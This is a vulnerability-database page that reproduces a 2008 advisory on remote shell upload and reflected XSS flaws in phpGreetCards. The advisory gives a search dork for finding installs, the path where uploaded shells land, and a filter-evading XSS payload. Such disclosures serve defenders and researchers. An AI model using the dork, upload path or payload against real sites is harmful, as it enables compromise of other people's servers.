Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

phpGreetCards XSS / File Upload

๐Ÿ—“๏ธย 30 Dec 2008ย 00:00:00Reported byย ahmadbadyTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 26ย Views

PHP Greet Cards remote shell upload and XSS vulnerabilit

Show more
Code
`...................................................................................................  
  
****(remote shell upload/xss)****  
  
script: phpGreetCards  
  
***************************************************************************  
download from:http://www.w2b.ru/download/phpGreetCards.zip  
  
***************************************************************************  
www.site.com/path/index.php?mode=select&category  
  
shell: www.site.com/path/userfiles/number_shell.php  
-----------------------------------------------------------------------------------------  
dork:"powered by phpGreetCards"  
  
if folder userfiles is forbidden  
after get upload file u do right-click and see image properties and u see address file.  
  
------------------------------------------------------------------------------------------  
xss:  
index.php?mode=select&category=>"><ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>   
**************************************************  
  
  
Author: ahmadbady   
  
**************************************************  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
30 Dec 2008 00:00Current
phpgreetcardsremote shell uploadxssfile uploadw2b.ruuserfiles folderimage properties
26
.json
Report